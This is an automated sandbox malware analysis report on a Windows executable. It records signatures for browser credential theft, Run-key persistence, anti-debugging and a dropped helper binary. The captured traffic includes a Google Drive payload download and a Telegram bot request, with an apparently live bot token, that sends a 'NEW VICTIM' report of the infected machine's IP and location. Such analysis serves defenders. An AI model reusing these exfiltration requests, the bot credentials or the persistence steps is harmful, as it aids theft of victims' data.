Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1573853
MD5:3567cb15156760b2f111512ffdbc1451
SHA1:2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256:0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
Tags:exeuser-Bitsight
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to determine the online IP of the system
Creates files in the system32 config directory
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to enumerate network shares
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 7744 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • file.exe (PID: 7540 cmdline: C:\Users\user\Desktop\file.exe MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 7880 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 8140 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 8184 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

System Summary

barindex
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files\Windows Media Player\graph\graph.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: file.exeReversingLabs: Detection: 63%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graphJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49749 version: TLS 1.2
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC08A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,0_2_00007FF7ABC08A90
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC09B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7ABC09B00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC3E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF7ABC3E440
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC3E3CC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF7ABC3E3CC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC6070C FindFirstFileExW,0_2_00007FF7ABC6070C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FCD08 FindClose,FindFirstFileExW,GetLastError,4_2_00007FF6A22FCD08
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A230FA54 FindFirstFileExW,4_2_00007FF6A230FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,4_2_00007FF6A22FCD7C

Networking

barindex
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC13CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher0_2_00007FF7ABC13CE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC13CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json0_2_00007FF7ABC13CE0
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: ipinfo.io
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC13CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7ABC13CE0
Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: drive.google.com
Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/-
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/.d
Source: file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/2
Source: file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/J
Source: file.exeString found in binary or memory: https://api.telegram.org/bot
Source: file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
Source: file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: file.exeString found in binary or memory: https://api.telegram.org/botFailed
Source: file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/dentifier
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/nd
Source: file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/t-477772811-jspb
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/
Source: file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore3D
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D10311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore7
Source: file.exe, 00000000.00000003.1353932053.0000023218926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353955254.0000023218931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreQ
Source: file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D1032F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreRc
Source: file.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreh
Source: file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorem
Source: file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.goo
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: file.exe, 00000000.00000003.1353795713.000002321890C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx-
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx5
Source: file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10331000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D1032F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx8
Source: file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361088766.0000012D1032A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxX
Source: file.exe, 00000000.00000003.1354224937.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354379801.0000023218915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxm
